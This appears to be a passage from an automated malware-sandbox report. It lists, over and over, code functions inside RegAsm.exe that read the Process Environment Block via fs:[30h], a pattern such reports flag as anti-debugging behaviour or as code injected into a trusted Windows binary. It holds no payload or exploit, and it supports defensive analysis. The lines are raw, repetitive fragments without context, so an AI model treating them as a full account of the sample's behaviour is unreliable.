                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D2349 mov eax, dword ptr fs:[00000030h]1_2_028D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D035C mov eax, dword ptr fs:[00000030h]1_2_028D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D035C mov eax, dword ptr fs:[00000030h]1_2_028D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D035C mov eax, dword ptr fs:[00000030h]1_2_028D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D035C mov ecx, dword ptr fs:[00000030h]1_2_028D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D035C mov eax, dword ptr fs:[00000030h]1_2_028D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D035C mov eax, dword ptr fs:[00000030h]1_2_028D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0292634F mov eax, dword ptr fs:[00000030h]1_2_0292634F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F8350 mov ecx, dword ptr fs:[00000030h]1_2_028F8350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F437C mov eax, dword ptr fs:[00000030h]1_2_028F437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285208A mov eax, dword ptr fs:[00000030h]1_2_0285208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028480A0 mov eax, dword ptr fs:[00000030h]1_2_028480A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E80A8 mov eax, dword ptr fs:[00000030h]1_2_028E80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029160B8 mov eax, dword ptr fs:[00000030h]1_2_029160B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029160B8 mov ecx, dword ptr fs:[00000030h]1_2_029160B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D20DE mov eax, dword ptr fs:[00000030h]1_2_028D20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0284A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028580E9 mov eax, dword ptr fs:[00000030h]1_2_028580E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D60E0 mov eax, dword ptr fs:[00000030h]1_2_028D60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284C0F0 mov eax, dword ptr fs:[00000030h]1_2_0284C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028920F0 mov ecx, dword ptr fs:[00000030h]1_2_028920F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284A00D mov eax, dword ptr fs:[00000030h]1_2_0284A00D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D4000 mov ecx, dword ptr fs:[00000030h]1_2_028D4000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h]1_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h]1_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h]1_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h]1_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h]1_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h]1_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h]1_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F2000 mov eax, dword ptr fs:[00000030h]1_2_028F2000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E016 mov eax, dword ptr fs:[00000030h]1_2_0286E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E016 mov eax, dword ptr fs:[00000030h]1_2_0286E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E016 mov eax, dword ptr fs:[00000030h]1_2_0286E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E016 mov eax, dword ptr fs:[00000030h]1_2_0286E016
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284A020 mov eax, dword ptr fs:[00000030h]1_2_0284A020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284C020 mov eax, dword ptr fs:[00000030h]1_2_0284C020
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E6030 mov eax, dword ptr fs:[00000030h]1_2_028E6030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02852050 mov eax, dword ptr fs:[00000030h]1_2_02852050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6050 mov eax, dword ptr fs:[00000030h]1_2_028D6050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0287C073 mov eax, dword ptr fs:[00000030h]1_2_0287C073
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02890185 mov eax, dword ptr fs:[00000030h]1_2_02890185
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F4180 mov eax, dword ptr fs:[00000030h]1_2_028F4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F4180 mov eax, dword ptr fs:[00000030h]1_2_028F4180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D019F mov eax, dword ptr fs:[00000030h]1_2_028D019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D019F mov eax, dword ptr fs:[00000030h]1_2_028D019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D019F mov eax, dword ptr fs:[00000030h]1_2_028D019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D019F mov eax, dword ptr fs:[00000030h]1_2_028D019F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284A197 mov eax, dword ptr fs:[00000030h]1_2_0284A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284A197 mov eax, dword ptr fs:[00000030h]1_2_0284A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284A197 mov eax, dword ptr fs:[00000030h]1_2_0284A197
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290C188 mov eax, dword ptr fs:[00000030h]1_2_0290C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290C188 mov eax, dword ptr fs:[00000030h]1_2_0290C188
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029161C3 mov eax, dword ptr fs:[00000030h]1_2_029161C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029161C3 mov eax, dword ptr fs:[00000030h]1_2_029161C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE1D0 mov eax, dword ptr fs:[00000030h]1_2_028CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE1D0 mov eax, dword ptr fs:[00000030h]1_2_028CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE1D0 mov ecx, dword ptr fs:[00000030h]1_2_028CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE1D0 mov eax, dword ptr fs:[00000030h]1_2_028CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE1D0 mov eax, dword ptr fs:[00000030h]1_2_028CE1D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028801F8 mov eax, dword ptr fs:[00000030h]1_2_028801F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029261E5 mov eax, dword ptr fs:[00000030h]1_2_029261E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov ecx, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov ecx, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov ecx, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov eax, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FE10E mov ecx, dword ptr fs:[00000030h]1_2_028FE10E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02910115 mov eax, dword ptr fs:[00000030h]1_2_02910115
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FA118 mov ecx, dword ptr fs:[00000030h]1_2_028FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FA118 mov eax, dword ptr fs:[00000030h]1_2_028FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FA118 mov eax, dword ptr fs:[00000030h]1_2_028FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028FA118 mov eax, dword ptr fs:[00000030h]1_2_028FA118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02880124 mov eax, dword ptr fs:[00000030h]1_2_02880124
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E4144 mov eax, dword ptr fs:[00000030h]1_2_028E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E4144 mov eax, dword ptr fs:[00000030h]1_2_028E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E4144 mov ecx, dword ptr fs:[00000030h]1_2_028E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E4144 mov eax, dword ptr fs:[00000030h]1_2_028E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E4144 mov eax, dword ptr fs:[00000030h]1_2_028E4144
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856154 mov eax, dword ptr fs:[00000030h]1_2_02856154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02856154 mov eax, dword ptr fs:[00000030h]1_2_02856154
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284C156 mov eax, dword ptr fs:[00000030h]1_2_0284C156
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028E8158 mov eax, dword ptr fs:[00000030h]1_2_028E8158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924164 mov eax, dword ptr fs:[00000030h]1_2_02924164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02924164 mov eax, dword ptr fs:[00000030h]1_2_02924164
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02854690 mov eax, dword ptr fs:[00000030h]1_2_02854690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02854690 mov eax, dword ptr fs:[00000030h]1_2_02854690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C6A6 mov eax, dword ptr fs:[00000030h]1_2_0288C6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028866B0 mov eax, dword ptr fs:[00000030h]1_2_028866B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0288A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A6C7 mov eax, dword ptr fs:[00000030h]1_2_0288A6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D06F1 mov eax, dword ptr fs:[00000030h]1_2_028D06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D06F1 mov eax, dword ptr fs:[00000030h]1_2_028D06F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h]1_2_028CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h]1_2_028CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h]1_2_028CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE6F2 mov eax, dword ptr fs:[00000030h]1_2_028CE6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CE609 mov eax, dword ptr fs:[00000030h]1_2_028CE609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286260B mov eax, dword ptr fs:[00000030h]1_2_0286260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892619 mov eax, dword ptr fs:[00000030h]1_2_02892619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286E627 mov eax, dword ptr fs:[00000030h]1_2_0286E627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02886620 mov eax, dword ptr fs:[00000030h]1_2_02886620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888620 mov eax, dword ptr fs:[00000030h]1_2_02888620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285262C mov eax, dword ptr fs:[00000030h]1_2_0285262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0286C640 mov eax, dword ptr fs:[00000030h]1_2_0286C640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A660 mov eax, dword ptr fs:[00000030h]1_2_0288A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288A660 mov eax, dword ptr fs:[00000030h]1_2_0288A660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02882674 mov eax, dword ptr fs:[00000030h]1_2_02882674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291866E mov eax, dword ptr fs:[00000030h]1_2_0291866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0291866E mov eax, dword ptr fs:[00000030h]1_2_0291866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028F678E mov eax, dword ptr fs:[00000030h]1_2_028F678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028507AF mov eax, dword ptr fs:[00000030h]1_2_028507AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_029047A0 mov eax, dword ptr fs:[00000030h]1_2_029047A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0285C7C0 mov eax, dword ptr fs:[00000030h]1_2_0285C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D07C3 mov eax, dword ptr fs:[00000030h]1_2_028D07C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028727ED mov eax, dword ptr fs:[00000030h]1_2_028727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028727ED mov eax, dword ptr fs:[00000030h]1_2_028727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028727ED mov eax, dword ptr fs:[00000030h]1_2_028727ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DE7E1 mov eax, dword ptr fs:[00000030h]1_2_028DE7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028547FB mov eax, dword ptr fs:[00000030h]1_2_028547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028547FB mov eax, dword ptr fs:[00000030h]1_2_028547FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C700 mov eax, dword ptr fs:[00000030h]1_2_0288C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850710 mov eax, dword ptr fs:[00000030h]1_2_02850710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02880710 mov eax, dword ptr fs:[00000030h]1_2_02880710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C720 mov eax, dword ptr fs:[00000030h]1_2_0288C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288C720 mov eax, dword ptr fs:[00000030h]1_2_0288C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288273C mov eax, dword ptr fs:[00000030h]1_2_0288273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288273C mov ecx, dword ptr fs:[00000030h]1_2_0288273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288273C mov eax, dword ptr fs:[00000030h]1_2_0288273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028CC730 mov eax, dword ptr fs:[00000030h]1_2_028CC730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288674D mov esi, dword ptr fs:[00000030h]1_2_0288674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288674D mov eax, dword ptr fs:[00000030h]1_2_0288674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0288674D mov eax, dword ptr fs:[00000030h]1_2_0288674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DE75D mov eax, dword ptr fs:[00000030h]1_2_028DE75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02850750 mov eax, dword ptr fs:[00000030h]1_2_02850750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D4755 mov eax, dword ptr fs:[00000030h]1_2_028D4755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892750 mov eax, dword ptr fs:[00000030h]1_2_02892750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02892750 mov eax, dword ptr fs:[00000030h]1_2_02892750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02858770 mov eax, dword ptr fs:[00000030h]1_2_02858770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02860770 mov eax, dword ptr fs:[00000030h]1_2_02860770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0290A49A mov eax, dword ptr fs:[00000030h]1_2_0290A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028564AB mov eax, dword ptr fs:[00000030h]1_2_028564AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028844B0 mov ecx, dword ptr fs:[00000030h]1_2_028844B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028DA4B0 mov eax, dword ptr fs:[00000030h]1_2_028DA4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028504E5 mov ecx, dword ptr fs:[00000030h]1_2_028504E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888402 mov eax, dword ptr fs:[00000030h]1_2_02888402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888402 mov eax, dword ptr fs:[00000030h]1_2_02888402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_02888402 mov eax, dword ptr fs:[00000030h]1_2_02888402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284C427 mov eax, dword ptr fs:[00000030h]1_2_0284C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h]1_2_0284E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h]1_2_0284E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_0284E420 mov eax, dword ptr fs:[00000030h]1_2_0284E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 1_2_028D6420 mov eax, dword ptr fs:[00000030h]1_2_028D6420
